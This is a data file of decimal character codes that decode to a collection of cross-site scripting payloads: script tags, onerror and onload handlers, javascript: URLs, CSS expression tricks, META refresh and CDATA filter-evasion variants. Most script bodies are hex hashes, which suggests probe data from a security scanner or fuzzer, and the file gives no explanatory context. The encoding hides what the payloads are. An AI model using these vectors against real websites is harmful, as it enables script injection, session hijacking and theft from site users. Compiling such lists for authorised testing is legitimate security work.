37,55,51,37,51,100,37,50,50,37,54,56,37,55,52,37,54,100,37,54,99,37,50,50,37,50,48,37,54,52,37,54,49,37,55,52,37,54,49,37,55,51,37,55,50,37,54,51,37,51,100,37,50,50,37,50,51,37,51,53,37,51,57,37,54,51,37,54,53,37,51,49,37,51,57,37,51,49,37,51,52,37,51,52,37,51,57,37,51,52,37,54,49,37,51,48,37,51,50,37,51,50,37,54,50,37,51,53,37,51,51,37,51,48,37,51,57,37,51,53,37,51,57,37,51,53,37,51,57,37,54,50,37,51,49,37,51,55,37,54,52,37,51,57,37,51,48,37,51,57,37,54,53,37,50,50,37,51,101,37,51,99,37,50,102,37,54,52,37,54,57,37,55,54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3,56,37,52,100,37,52,99,37,50,48,37,52,57,37,52,52,37,51,100,37,52,57,37,51,101,37,51,99,37,53,56,37,51,101,37,51,99,37,52,51,37,51,101,37,51,99,37,50,49,37,53,98,37,52,51,37,52,52,37,52,49,37,53,52,37,52,49,37,53,98,37,51,99,37,52,57,37,52,100,37,52,55,37,50,48,37,53,51,37,53,50,37,52,51,37,51,100,37,50,50,37,54,97,37,54,49,37,55,54,37,54,49,37,55,51,37,53,100,37,53,100,37,51,99,37,50,49,37,53,98,37,52,51,37,52,52,37,52,49,37,53,52,37,52,49,37,53,98,37,54,51,37,55,50,37,54,57,37,55,48,37,55,52,37,51,97,37,54,54,37,54,53,37,54,50,37,51,52,37,51,50,37,51,49,37,54,52,37,51,52,37,51,49,37,51,57,37,51,48,37,51,56,37,54,51,37,51,55,37,51,49,37,51,53,37,51,57,37,51,48,37,51,51,37,51,52,37,54,52,37,51,51,37,51,49,37,54,51,37,51,52,37,51,57,37,51,49,37,51,56,37,51,57,37,51,49,37,54,52,37,51,50,37,50,50,37,51,101,37,53,100,37,53,100,37,51,99,37,50,102,37,52,51,37,51,101,37,51,99,37,53,56,37,51,101,37,51,99,37,50,102,37,55,56,37,54,100,37,54,99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4,37,54,102,37,55,50,37,54,100,37,50,48,37,54,57,37,54,52,37,51,100,37,50,50,37,55,52,37,54,53,37,55,51,37,55,52,37,50,50,37,50,48,37,50,102,37,51,101,37,51,99,37,54,50,37,55,53,37,55,52,37,55,52,37,54,102,37,54,101,37,50,48,37,54,54,37,54,102,37,55,50,37,54,100,37,51,100,37,50,50,37,55,52,37,54,53,37,55,51,37,55,52,37,50,50,37,50,48,37,54,54,37,54,102,37,55,50,37,54,100,37,54,49,37,54,51,37,55,52,37,54,57,37,54,102,37,54,101,37,51,100,37,50,50,37,54,97,37,54,49,37,55,54,37,54,49,37,55,51,37,54,51,37,55,50,37,54,57,37,55,48,37,55,52,37,51,97,37,51,53,37,51,50,37,51,49,37,54,49,37,51,48,37,51,51,37,51,49,37,51,56,37,54,53,37,51,50,37,54,50,37,51,48,37,51,56,37,51,56,37,51,55,37,51,55,37,54,53,37,51,55,37,54,50,37,54,49,37,51,55,37,51,54,37,51,48,37,54,49,37,51,50,37,54,49,37,51,50,37,51,57,37,51,55,37,51,54,37,51,51,37,54,49,37,50,50,37,51,101,37,53,5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101,37,55,48,37,55,53,37,55,52,37,50,48,37,54,102,37,54,101,37,54,54,37,54,102,37,54,51,37,55,53,37,55,51,37,51,100,37,54,97,37,54,49,37,55,54,37,54,49,37,55,51,37,54,51,37,55,50,37,54,57,37,55,48,37,55,52,37,51,97,37,51,50,37,54,49,37,51,49,37,51,57,37,51,55,37,51,53,37,54,49,37,51,49,37,54,54,37,51,57,37,51,48,37,51,50,37,51,49,37,54,49,37,51,49,37,51,56,37,54,50,37,51,52,37,54,53,37,51,49,37,51,51,37,54,50,37,54,53,37,54,53,37,54,51,37,51,55,37,54,54,37,54,51,37,51,50,37,54,49,37,54,52,37,51,55,37,50,48,37,54,49,37,55,53,37,55,52,37,54,102,37,54,54,37,54,102,37,54,51,37,55,53,37,55,51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5,51,37,54,53,37,54,99,37,54,53,37,54,51,37,55,52,37,50,48,37,54,102,37,54,101,37,54,54,37,54,102,37,54,51,37,55,53,37,55,51,37,51,100,37,54,97,37,54,49,37,55,54,37,54,49,37,55,51,37,54,51,37,55,50,37,54,57,37,55,48,37,55,52,37,51,97,37,54,49,37,51,54,37,54,49,37,51,50,37,54,54,37,54,53,37,51,53,37,54,52,37,51,48,37,54,49,37,51,49,37,51,54,37,51,54,37,54,51,37,51,48,37,54,51,37,51,55,37,51,50,37,54,50,37,51,53,37,51,49,37,51,51,37,51,55,37,54,53,37,54,49,37,51,50,37,51,51,37,51,54,37,51,56,37,51,48,37,51,50,37,54,51,37,50,48,37,54,49,37,55,53,37,55,52,37,54,102,37,54,54,37,54,102,37,54,51,37,55,53,37,55,51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5,52,37,54,53,37,55,56,37,55,52,37,54,49,37,55,50,37,54,53,37,54,49,37,50,48,37,54,102,37,54,101,37,54,54,37,54,102,37,54,51,37,55,53,37,55,51,37,51,100,37,54,97,37,54,49,37,55,54,37,54,49,37,55,51,37,54,51,37,55,50,37,54,57,37,55,48,37,55,52,37,51,97,37,51,55,37,51,51,37,51,50,37,51,52,37,54,54,37,54,54,37,51,52,37,51,54,37,51,51,37,51,55,37,51,51,37,51,55,37,51,57,37,51,51,37,51,56,37,51,48,37,54,54,37,51,57,37,51,54,37,54,54,37,54,53,37,54,51,37,51,54,37,51,57,37,51,52,37,54,52,37,54,51,37,51,57,37,51,55,37,51,48,37,54,53,37,54,51,37,50,48,37,54,49,37,55,53,37,55,52,37,54,102,37,54,54,37,54,102,37,54,51,37,55,53,37,55,51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98,37,54,53,37,55,57,37,54,55,37,54,53,37,54,101,37,50,48,37,54,102,37,54,101,37,54,54,37,54,102,37,54,51,37,55,53,37,55,51,37,51,100,37,54,97,37,54,49,37,55,54,37,54,49,37,55,51,37,54,51,37,55,50,37,54,57,37,55,48,37,55,52,37,51,97,37,54,54,37,51,52,37,51,49,37,54,49,37,51,49,37,51,56,37,54,49,37,51,51,37,54,49,37,54,49,37,54,53,37,51,54,37,54,51,37,51,53,37,51,51,37,51,49,37,51,50,37,51,51,37,54,50,37,51,48,37,54,52,37,51,50,37,51,52,37,51,54,37,51,56,37,54,53,37,51,49,37,51,51,37,51,54,37,54,50,37,51,52,37,51,49,37,50,48,37,54,49,37,55,53,37,55,52,37,54,102,37,54,54,37,54,102,37,54,51,37,55,53,37,55,51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7,37,54,101,37,55,48,37,55,53,37,55,52,37,50,48,37,54,102,37,54,101,37,54,50,37,54,99,37,55,53,37,55,50,37,51,100,37,54,97,37,54,49,37,55,54,37,54,49,37,55,51,37,54,51,37,55,50,37,54,57,37,55,48,37,55,52,37,51,97,37,51,48,37,51,55,37,51,51,37,54,50,37,51,54,37,51,51,37,51,55,37,51,49,37,51,51,37,51,53,37,54,54,37,51,54,37,51,49,37,51,51,37,51,53,37,54,52,37,51,56,37,51,56,37,54,54,37,54,52,37,51,52,37,54,52,37,51,54,37,54,52,37,51,55,37,51,53,37,54,50,37,51,48,37,54,51,37,54,49,37,54,50,37,51,57,37,50,48,37,54,49,37,55,53,37,55,52,37,54,102,37,54,54,37,54,102,37,54,51,37,55,53,37,55,51,37,51,101,37,51,99,37,54,57,37,54,101,37,55,48,37,55,53,37,55,52,37,50,48,37,54,49,37,55,53,37,55,52,37,54,102,37,54,54,37,54,102,37,54,51,37,55,53,37,55,51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5,54,37,54,57,37,54,52,37,54,53,37,54,102,37,50,48,37,55,48,37,54,102,37,55,51,37,55,52,37,54,53,37,55,50,37,51,100,37,54,97,37,54,49,37,55,54,37,54,49,37,55,51,37,54,51,37,55,50,37,54,57,37,55,48,37,55,52,37,51,97,37,51,55,37,51,51,37,54,52,37,51,55,37,51,51,37,51,50,37,54,51,37,51,51,37,51,55,37,51,56,37,51,54,37,54,53,37,54,49,37,54,52,37,51,54,37,54,51,37,54,51,37,51,53,37,51,54,37,51,57,37,54,52,37,51,54,37,51,56,37,51,51,37,51,50,37,51,49,37,51,55,37,54,49,37,54,50,37,51,56,37,51,56,37,51,54,37,50,102,37,50,10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4,50,37,54,102,37,54,52,37,55,57,37,50,48,37,54,102,37,54,101,37,55,51,37,54,51,37,55,50,37,54,102,37,54,99,37,54,99,37,51,100,37,54,51,37,51,51,37,51,51,37,54,50,37,51,52,37,51,48,37,51,55,37,51,55,37,51,52,37,51,52,37,51,51,37,51,53,37,51,56,37,51,56,37,51,48,37,54,54,37,51,50,37,51,48,37,54,49,37,51,54,37,51,53,37,51,51,37,51,55,37,54,49,37,51,57,37,54,54,37,54,52,37,54,50,37,51,52,37,51,53,37,51,54,37,51,54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0,37,55,50,37,51,101,37,51,99,37,54,57,37,54,101,37,55,48,37,55,53,37,55,52,37,50,48,37,54,49,37,55,53,37,55,52,37,54,102,37,54,54,37,54,102,37,54,51,37,55,53,37,55,51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3,56,37,51,99,37,54,54,37,54,102,37,55,50,37,54,100,37,50,48,37,54,57,37,54,52,37,51,100,37,55,52,37,54,53,37,55,51,37,55,52,37,50,48,37,54,102,37,54,101,37,54,54,37,54,102,37,55,50,37,54,100,37,54,57,37,54,101,37,55,48,37,55,53,37,55,52,37,51,100,37,54,97,37,54,49,37,55,54,37,54,49,37,55,51,37,54,51,37,55,50,37,54,57,37,55,48,37,55,52,37,51,97,37,51,48,37,51,55,37,54,52,37,54,50,37,54,50,37,51,52,37,51,57,37,51,51,37,54,49,37,54,49,37,51,56,37,51,49,37,51,55,37,54,50,37,51,54,37,54,54,37,54,49,37,51,51,37,51,48,37,51,48,37,51,53,37,51,49,37,51,49,37,51,48,37,51,54,37,54,50,37,51,55,37,51,56,37,54,51,37,54,50,37,51,50,37,51,49,37,51,101,37,51,99,37,54,57,37,54,101,37,55,48,37,55,53,37,55,52,37,51,101,37,51,99,37,50,102,37,54,54,37,54,102,37,55,50,37,54,10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3,56,37,51,99,37,54,54,37,54,102,37,55,50,37,54,100,37,50,48,37,54,57,37,54,52,37,51,100,37,55,52,37,54,53,37,55,51,37,55,52,37,51,101,37,51,99,37,54,57,37,54,101,37,55,48,37,55,53,37,55,52,37,51,101,37,51,99,37,50,102,37,54,54,37,54,102,37,55,50,37,54,100,37,51,101,37,51,99,37,54,50,37,55,53,37,55,52,37,55,52,37,54,102,37,54,101,37,50,48,37,54,54,37,54,102,37,55,50,37,54,100,37,51,100,37,55,52,37,54,53,37,55,51,37,55,52,37,50,48,37,54,102,37,54,101,37,54,54,37,54,102,37,55,50,37,54,100,37,54,51,37,54,56,37,54,49,37,54,101,37,54,55,37,54,53,37,51,100,37,51,100,37,54,97,37,54,49,37,55,54,37,54,49,37,55,51,37,54,51,37,55,50,37,54,57,37,55,48,37,55,52,37,51,97,37,51,53,37,54,54,37,51,54,37,54,53,37,54,49,37,51,55,37,54,54,37,54,53,37,51,53,37,51,53,37,51,57,37,51,54,37,51,56,37,51,54,37,54,53,37,51,50,37,51,53,37,54,53,37,51,56,37,54,54,37,51,54,37,51,51,37,51,57,37,51,56,37,51,57,37,51,48,37,51,48,37,51,52,37,51,51,37,51,51,37,51,49,37,51,52,37,51,101,37,53,5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5,54,37,54,57,37,54,52,37,54,53,37,54,102,37,51,101,37,51,99,37,55,51,37,54,102,37,55,53,37,55,50,37,54,51,37,54,53,37,50,48,37,54,102,37,54,101,37,54,53,37,55,50,37,55,50,37,54,102,37,55,50,37,51,100,37,50,50,37,54,97,37,54,49,37,55,54,37,54,49,37,55,51,37,54,51,37,55,50,37,54,57,37,55,48,37,55,52,37,51,97,37,51,49,37,51,54,37,51,54,37,51,52,37,54,52,37,51,49,37,54,54,37,51,48,37,54,53,37,54,52,37,51,52,37,51,50,37,54,51,37,54,50,37,51,55,37,51,54,37,51,49,37,54,50,37,51,49,37,54,51,37,54,49,37,54,53,37,51,49,37,51,49,37,51,52,37,54,49,37,51,53,37,54,54,37,51,56,37,54,52,37,51,55,37,54,51,37,50,50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7,51,99,37,55,54,37,54,57,37,54,52,37,54,53,37,54,102,37,50,48,37,54,102,37,54,101,37,54,53,37,55,50,37,55,50,37,54,102,37,55,50,37,51,100,37,50,50,37,54,97,37,54,49,37,55,54,37,54,49,37,55,51,37,54,51,37,55,50,37,54,57,37,55,48,37,55,52,37,51,97,37,51,56,37,51,54,37,54,49,37,51,56,37,51,48,37,54,52,37,51,48,37,51,50,37,51,52,37,54,49,37,54,54,37,51,49,37,51,56,37,51,54,37,51,55,37,51,57,37,54,49,37,51,55,37,51,51,37,51,52,37,51,55,37,54,52,37,51,51,37,51,53,37,51,53,37,54,53,37,51,51,37,51,51,37,51,56,37,54,49,37,54,52,37,51,51,37,50,50,37,51,101,37,51,99,37,55,51,37,54,102,37,55,53,37,55,50,37,54,51,37,54,53,37,51,10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57,53,100,99,53,102,101,98,48,51,56,50,101,98,99,97,52,57,100,98,101,102,53,56,56,57,56,53,99,50,51,4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83,67,82,73,80,84,62,97,108,101,114,116,40,39,101,50,54,101,54,99,56,52,101,56,48,101,48,102,50,99,100,56,98,99,101,57,54,52,102,99,52,49,50,97,48,50,39,4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98,100,102,98,102,102,98,49,55,53,99,53,48,48,56,52,97,98,99,101,54,54,50,54,53,99,48,52,50,49,97,48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47,84,73,84,76,69,62,57,56,55,57,51,57,49,101,52,100,52,55,49,52,50,51,56,56,52,49,51,98,51,54,53,53,55,99,49,52,54,9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105,109,103,32,115,114,99,61,34,120,58,120,34,32,111,110,101,114,114,111,114,61,34,100,99,51,53,54,49,54,54,99,50,57,102,57,101,55,55,102,54,97,101,52,98,55,100,57,102,54,50,101,102,98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111,110,108,111,97,100,33,35,36,37,38,40,41,42,126,43,45,95,46,44,58,59,63,64,91,47,124,92,93,94,96,61,97,97,100,49,97,98,99,57,56,53,97,48,57,101,53,48,55,98,99,52,55,51,51,98,55,50,100,101,54,48,54,5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97,98,50,101,50,102,50,48,102,56,51,98,55,97,50,55,97,52,100,52,49,53,50,51,101,101,50,101,55,57,52,56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50,56,52,57,53,102,102,99,99,52,100,99,100,48,51,54,97,102,57,49,97,50,52,98,49,57,56,57,101,54,49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54,56,97,53,57,99,54,51,51,56,48,98,98,56,53,55,51,57,50,97,100,56,48,52,53,48,48,49,50,97,54,50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96,51,50,51,52,49,57,55,101,55,100,98,102,100,56,56,52,49,49,57,53,55,57,98,48,100,53,102,49,57,102,100,54,96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34,34,34,62,50,101,53,101,102,55,97,49,49,100,48,50,101,100,52,53,49,51,53,49,49,48,101,48,56,49,52,101,57,100,102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2,38,35,49,52,59,32,32,102,53,97,51,56,99,50,98,53,101,53,97,97,55,57,55,56,55,55,57,101,57,102,52,99,51,53,52,55,48,55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1,104,97,118,105,111,117,114,58,32,117,114,108,40,57,97,98,56,50,52,55,97,52,52,50,49,54,55,100,99,97,49,101,48,50,99,50,54,56,100,99,100,50,97,48,53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0,83,67,82,73,80,84,62,97,49,48,98,49,100,52,97,57,56,97,48,56,49,97,55,97,53,97,56,101,97,54,56,55,98,100,49,52,100,98,55,47,47,60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59,55,49,56,54,101,97,102,101,98,49,49,98,101,49,55,99,49,101,50,48,55,98,102,101,57,50,52,98,50,51,51,102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98,57,54,49,56,100,57,57,48,53,57,48,49,54,101,51,49,55,102,101,55,54,97,101,97,56,99,48,56,98,53,57,3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66,65,67,75,71,82,79,85,78,68,61,34,50,48,53,100,55,97,53,57,97,52,55,55,56,51,100,54,99,48,51,53,99,54,56,56,49,101,57,98,100,53,97,9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8,80,85,84,32,84,89,80,69,61,34,73,77,65,71,69,34,32,83,82,67,61,34,98,53,52,57,51,98,97,48,52,99,55,99,49,52,99,55,54,52,55,102,52,97,55,102,49,49,101,49,56,101,48,5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79,78,76,79,65,68,61,49,53,49,53,99,100,48,49,101,53,57,56,52,101,49,102,100,100,99,101,100,55,50,100,97,52,54,97,51,99,100,5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68,89,78,83,82,67,61,34,56,48,52,101,52,50,99,99,57,55,99,52,57,56,98,48,98,48,100,102,49,101,52,51,100,99,54,53,48,55,53,9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76,79,87,83,82,67,61,34,49,53,101,57,100,57,51,48,51,102,51,55,100,97,48,50,102,52,52,48,49,100,99,101,50,55,49,98,99,99,97,5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1,83,79,85,78,68,32,83,82,67,61,34,97,102,49,49,48,57,102,48,55,48,102,101,97,53,99,50,102,57,48,99,52,57,51,48,100,54,54,55,50,101,56,5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82,32,83,73,90,69,61,34,38,123,100,49,100,100,102,53,53,101,49,57,52,56,52,53,99,55,52,101,54,98,98,49,97,48,53,51,99,102,55,48,102,51,12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73,78,75,32,82,69,76,61,34,115,116,121,108,101,115,104,101,101,116,34,32,72,82,69,70,61,34,97,100,53,101,49,98,52,50,51,100,98,53,54,98,99,48,102,55,53,51,57,50,100,51,53,57,48,52,97,100,57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118,98,115,99,114,105,112,116,58,52,53,55,98,102,49,98,48,100,50,55,101,102,57,102,98,100,48,97,52,57,53,57,54,55,97,97,101,57,57,49,99,3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9,111,99,104,97,58,91,49,54,97,49,98,55,101,102,52,97,52,97,102,56,53,99,101,100,53,53,52,57,100,49,56,54,57,49,102,101,102,101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8,105,118,101,115,99,114,105,112,116,58,91,52,51,99,98,50,50,55,101,49,99,51,50,49,102,49,102,49,48,56,48,52,52,100,51,52,54,98,99,53,48,50,97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114,101,102,114,101,115,104,34,32,67,79,78,84,69,78,84,61,34,48,59,117,114,108,61,50,102,102,99,54,50,54,97,101,53,97,100,53,57,54,101,101,55,50,56,98,51,101,99,98,51,53,55,97,57,101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53,54,97,98,51,102,55,100,51,53,52,102,98,102,57,48,51,98,100,100,57,52,97,98,50,51,51,54,50,50,54,5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106,97,118,97,115,99,114,105,112,116,58,55,51,100,53,56,54,100,50,55,53,100,48,49,51,56,50,52,49,57,55,57,102,49,98,51,98,52,52,55,97,57,53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99,97,53,51,57,57,54,101,53,49,56,57,55,101,102,99,52,56,101,52,99,50,56,102,53,55,49,101,97,54,50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50,53,52,53,102,57,98,57,51,57,99,102,52,57,55,51,52,48,51,102,102,99,56,101,54,100,102,50,49,101,54,50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100,57,51,49,55,101,56,57,97,102,99,48,50,56,101,102,101,55,49,55,99,50,48,100,51,99,53,98,100,48,57,48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0,82,65,77,69,32,83,82,67,61,34,49,99,98,101,97,98,98,56,101,55,51,99,98,53,56,49,97,55,51,51,102,50,48,54,50,98,49,54,57,53,56,102,34,62,60,47,73,70,82,65,77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47,111,110,108,111,97,100,61,56,50,49,97,54,97,55,48,97,100,54,51,54,54,52,50,54,55,99,49,51,50,102,55,56,98,55,48,50,54,51,51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34,111,110,108,111,97,100,61,99,99,52,49,56,53,98,54,52,98,98,54,102,55,100,51,97,101,50,54,98,55,48,100,99,101,56,97,55,52,100,98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47,47,47,47,47,47,111,110,108,111,97,100,61,99,54,48,48,97,48,100,54,52,49,100,101,51,50,56,57,54,55,55,52,55,102,55,55,48,49,98,55,56,99,55,98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32,34,111,110,108,111,97,100,61,51,97,102,57,98,54,98,99,51,57,50,56,57,100,55,49,101,51,53,101,49,52,57,100,57,49,98,55,53,50,57,101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34,111,110,108,111,97,100,61,101,51,97,52,56,97,54,54,55,48,51,50,102,54,54,101,102,101,50,53,100,100,101,56,52,54,56,55,51,57,52,57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49,41,63,62,32,111,110,108,111,97,100,61,48,97,50,51,57,97,101,102,50,54,48,53,49,52,55,48,54,49,101,57,54,56,53,57,54,99,54,100,56,55,48,101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50,41,63,62,32,111,110,108,111,97,100,61,102,48,57,100,101,57,48,100,53,102,50,54,48,53,97,54,51,48,98,98,51,49,48,97,53,53,54,98,98,100,55,49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0,82,65,77,69,83,69,84,62,60,70,82,65,77,69,32,83,82,67,61,34,57,99,100,50,55,98,55,56,55,52,52,52,50,98,53,97,54,51,51,50,51,100,54,50,49,98,48,54,57,99,52,100,34,62,60,47,70,82,65,77,69,83,69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98,57,53,56,100,54,52,102,52,57,50,56,48,57,97,53,48,99,101,99,102,102,50,55,54,53,97,48,52,100,101,4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55,51,56,49,54,98,50,50,56,98,57,53,54,57,53,53,53,51,98,50,101,52,54,52,56,98,54,50,97,98,57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100,97,102,57,57,52,98,49,48,50,56,57,99,100,52,102,48,99,49,55,53,101,100,54,56,52,53,97,51,54,100,53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97,57,48,55,102,48,51,49,57,50,102,52,48,48,97,100,49,100,100,54,48,99,56,48,53,50,56,50,52,49,49,50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4,89,76,69,61,34,120,115,115,58,101,120,112,114,47,42,56,49,55,53,52,56,56,97,53,100,56,55,98,55,99,97,48,100,48,57,56,98,57,98,53,50,97,51,101,97,50,101,42,47,101,115,115,105,111,110,40,56,49,55,53,52,56,56,97,53,100,56,55,98,55,99,97,48,100,48,57,56,98,57,98,53,50,97,51,101,97,50,101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52,101,54,52,100,52,50,100,48,52,54,51,102,52,100,99,52,56,97,99,53,55,55,57,102,54,57,101,55,98,51,51,32,83,84,89,76,69,61,34,120,115,115,58,101,120,112,114,101,115,115,105,111,110,40,52,101,54,52,100,52,50,100,48,52,54,51,102,52,100,99,52,56,97,99,53,55,55,57,102,54,57,101,55,98,51,51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84,89,80,69,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,53,53,56,50,55,50,102,54,48,49,57,100,52,56,97,49,99,98,56,55,57,100,102,99,99,56,54,101,48,54,50,54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46,49,57,100,52,51,55,98,48,97,52,50,55,48,53,50,53,54,55,51,55,55,57,56,55,48,53,101,57,53,54,102,52,123,98,97,99,107,103,114,111,117,110,100,45,105,109,97,103,101,58,117,114,108,40,34,49,57,100,52,51,55,98,48,97,52,50,55,48,53,50,53,54,55,51,55,55,57,56,55,48,53,101,57,53,54,102,52,34,41,59,125,60,47,83,84,89,76,69,62,60,65,32,67,76,65,83,83,61,49,57,100,52,51,55,98,48,97,52,50,55,48,53,50,53,54,55,51,55,55,57,56,55,48,53,101,57,53,54,102,52,62,60,47,6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116,121,112,101,61,34,116,101,120,116,47,99,115,115,34,62,66,79,68,89,123,98,97,99,107,103,114,111,117,110,100,58,117,114,108,40,34,97,54,53,98,54,53,49,99,100,56,57,55,48,99,51,101,102,100,97,48,51,102,98,48,99,50,98,100,53,52,48,54,34,41,125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91,105,102,32,103,116,101,32,73,69,32,52,93,62,99,56,97,50,53,101,99,97,99,48,57,102,54,51,49,50,101,101,98,101,99,57,55,102,56,49,49,100,56,53,52,48,60,33,91,101,110,100,105,102,93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65,83,69,32,72,82,69,70,61,34,50,100,57,52,56,97,98,54,50,57,54,54,57,54,100,97,52,57,98,101,97,98,100,57,54,53,97,52,102,50,99,49,47,4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97,101,50,52,102,100,97,101,45,48,51,99,54,45,49,49,100,49,45,56,98,55,54,45,48,48,56,48,99,55,52,52,102,51,56,57,62,60,112,97,114,97,109,32,110,97,109,101,61,117,114,108,32,118,97,108,117,101,61,54,48,48,56,100,52,51,98,49,57,52,51,55,56,51,97,97,101,49,53,54,49,99,102,97,54,56,98,56,102,102,100,62,60,47,79,66,74,69,67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97,61,34,103,101,116,34,59,98,61,34,85,82,76,40,34,34,59,99,61,34,106,97,118,97,115,99,114,105,112,116,58,34,59,100,61,34,53,49,52,54,99,98,97,55,102,97,50,50,50,48,49,99,101,102,48,98,100,48,52,50,51,51,100,57,55,48,97,100,34,41,34,59,101,118,97,108,40,97,43,98,43,99,43,100,41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3,32,101,99,104,111,40,39,60,83,67,82,41,39,59,101,99,104,111,40,39,73,80,84,62,49,52,53,51,53,50,55,98,98,49,98,51,55,97,97,97,98,53,48,100,102,55,97,54,101,102,98,102,52,55,48,50,60,47,83,67,82,73,80,84,62,39,41,59,32,63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83,101,116,45,67,111,111,107,105,101,34,32,67,111,110,116,101,110,116,61,34,85,83,69,82,73,68,61,38,108,116,59,83,67,82,73,80,84,38,103,116,59,101,102,101,97,101,97,55,50,56,55,97,55,97,102,56,49,52,50,52,98,98,56,101,52,54,51,49,54,49,55,51,56,38,108,116,59,47,83,67,82,73,80,84,38,103,116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83,82,67,61,104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,62,53,57,98,56,48,97,99,102,97,102,98,56,52,100,54,102,51,100,56,56,97,55,100,100,54,102,48,50,49,50,48,5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8,49,52,59,106,97,118,97,115,99,114,105,112,116,58,54,54,51,53,102,53,102,54,52,99,55,55,98,56,98,52,97,99,54,99,57,101,98,100,50,98,102,51,48,100,52,9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6,97,118,38,35,120,48,68,59,97,115,99,114,105,112,116,58,53,53,100,101,54,97,101,54,48,49,48,57,53,101,49,98,50,51,53,54,98,50,101,53,97,57,54,51,55,51,56,5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32,38,35,49,52,59,32,32,52,50,97,99,53,52,48,53,49,101,102,51,53,99,53,57,54,101,98,50,54,97,51,51,102,100,56,51,102,51,56,10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54,51,50,101,53,50,97,55,100,99,101,52,51,98,53,52,99,55,48,57,100,100,49,57,98,48,55,51,56,54,53,54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62,97,61,47,97,49,101,100,49,52,57,48,101,97,57,102,102,97,48,56,54,98,48,97,97,97,100,57,54,100,97,99,52,51,97,53,47,97,108,101,114,116,40,97,46,115,111,117,114,99,101,4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34,59,54,51,54,51,53,102,57,57,48,51,52,52,48,50,53,57,100,101,101,57,57,48,50,50,54,48,52,102,97,55,57,57,59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111,34,114,101,102,114,101,115,104,34,32,67,79,78,84,69,78,84,61,34,48,59,32,85,82,76,61,104,116,116,112,58,47,47,59,85,82,76,61,50,57,53,56,57,57,49,101,101,97,49,51,53,101,49,55,99,102,51,56,97,50,101,99,52,50,102,54,100,49,57,9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60,66,62,61,100,53,97,56,56,100,100,48,102,100,51,54,52,49,56,54,99,50,99,52,99,52,55,52,55,56,52,48,101,97,99,56,34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0,82,65,77,69,32,83,82,67,61,34,106,97,118,97,115,99,114,105,112,116,58,50,50,49,55,54,100,57,98,51,53,52,52,49,97,51,51,99,100,57,98,52,99,102,50,97,102,52,100,100,99,50,97,32,6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62,97,61,47,55,51,53,102,98,52,57,50,51,54,101,49,102,100,99,102,100,49,57,56,52,49,98,56,102,52,99,102,102,99,102,51,47,110,55,51,53,102,98,52,57,50,51,54,101,49,102,100,99,102,100,49,57,56,52,49,98,56,102,52,99,102,102,99,102,5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65,89,69,82,32,83,82,67,61,34,106,97,118,97,115,99,114,105,112,116,58,51,49,56,50,52,55,48,56,54,57,52,48,51,54,49,50,52,101,56,98,48,50,50,54,97,99,48,48,54,100,48,55,62,60,47,76,65,89,69,8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108,105,32,123,108,105,115,116,45,115,116,121,108,101,45,105,109,97,103,101,58,32,117,114,108,40,34,52,52,51,99,97,55,102,57,54,55,99,97,99,99,51,48,56,99,53,51,102,54,102,99,57,100,102,54,101,52,56,55,60,47,83,84,89,76,69,62,60,85,76,62,60,76,73,62,52,52,51,99,97,55,102,57,54,55,99,97,99,99,51,48,56,99,53,51,102,54,102,99,57,100,102,54,101,52,56,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106,97,118,97,115,99,114,105,112,116,58,57,49,102,48,102,99,55,52,101,57,49,49,56,52,50,100,48,49,97,56,99,97,52,97,52,48,97,49,100,99,100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102,102,100,55,99,99,101,99,50,102,54,99,49,99,52,57,54,57,99,102,50,56,50,101,101,99,55,49,102,53,48,100,43,65,68,119,45,47,83,67,82,73,80,84,43,65,68,52,4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106,97,118,97,115,99,114,105,112,116,35,52,100,99,50,52,48,57,97,99,57,50,54,57,49,51,100,54,101,101,54,102,52,97,101,51,54,48,52,98,98,50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6,121,112,101,61,34,105,109,97,103,101,34,32,100,121,110,115,114,99,61,34,50,57,57,102,49,49,54,49,55,54,55,54,48,98,99,52,53,98,53,98,56,53,97,57,55,98,52,99,53,48,54,10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56,51,48,53,48,99,100,101,49,53,49,57,97,50,52,55,55,51,57,101,97,98,97,97,55,101,97,57,100,54,48,9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123,56,51,54,101,54,51,52,51,57,57,99,55,97,53,55,53,54,101,52,100,101,101,56,56,97,53,98,53,101,100,98,51,125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8,123,55,55,99,49,98,57,53,51,52,53,100,54,98,54,54,50,53,98,54,54,101,49,48,49,53,99,55,55,56,97,50,55,125,5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97,98,111,117,116,58,99,54,56,54,52,102,55,56,52,57,57,101,99,100,97,49,102,55,51,52,57,99,101,99,97,100,48,100,98,101,56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5,110,100,105,110,103,58,32,117,114,108,40,106,97,118,97,115,99,114,105,112,116,58,51,57,102,49,50,102,49,49,97,97,101,56,100,101,101,99,57,55,99,50,48,56,55,100,49,50,50,54,97,55,49,100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46,46,46,34,32,99,111,100,101,98,97,115,101,61,34,106,97,118,97,115,99,114,105,112,116,58,100,56,99,52,53,53,98,101,52,97,54,53,99,53,52,100,51,57,100,54,99,50,50,52,49,49,56,52,53,98,57,5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16,121,108,101,62,60,33,45,45,60,47,115,116,121,108,101,62,60,83,67,82,73,80,84,62,102,97,98,57,55,98,49,53,55,97,98,49,98,55,50,55,49,99,48,56,100,55,54,57,52,97,54,50,49,101,51,101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3,91,67,68,65,84,65,91,60,33,45,45,93,93,60,83,67,82,73,80,84,62,48,97,53,51,51,52,53,54,101,53,48,56,97,101,52,54,54,100,51,52,55,56,98,52,54,100,99,56,54,53,99,54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32,45,45,32,45,45,62,99,102,55,54,49,52,102,56,51,57,51,100,53,54,102,98,54,49,53,101,54,53,56,98,57,101,51,56,99,101,100,100,60,33,45,45,32,45,45,32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20,109,108,32,105,100,61,34,88,34,62,60,97,62,60,98,62,99,50,56,97,99,57,102,50,55,56,50,53,99,102,100,48,97,52,48,100,48,55,56,56,56,99,97,50,48,102,97,99,59,60,98,62,60,47,97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0,105,118,32,100,97,116,97,102,108,100,61,34,98,34,32,100,97,116,97,102,111,114,109,97,116,97,115,61,34,104,116,109,108,34,32,100,97,116,97,115,114,99,61,34,35,50,50,98,100,100,97,98,54,54,53,54,56,53,98,56,101,54,57,49,49,55,57,100,101,101,99,52,50,57,101,55,49,34,62,60,47,100,105,11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8,77,76,32,73,68,61,73,62,60,88,62,60,67,62,60,33,91,67,68,65,84,65,91,60,73,77,71,32,83,82,67,61,34,106,97,118,97,115,93,93,60,33,91,67,68,65,84,65,91,99,114,105,112,116,58,53,98,51,57,56,102,50,51,48,50,54,102,98,50,54,102,52,100,57,56,100,49,51,53,98,48,54,53,56,55,55,54,34,62,93,93,60,47,67,62,60,88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2,111,114,109,32,105,100,61,34,116,101,115,116,34,32,47,62,60,98,117,116,116,1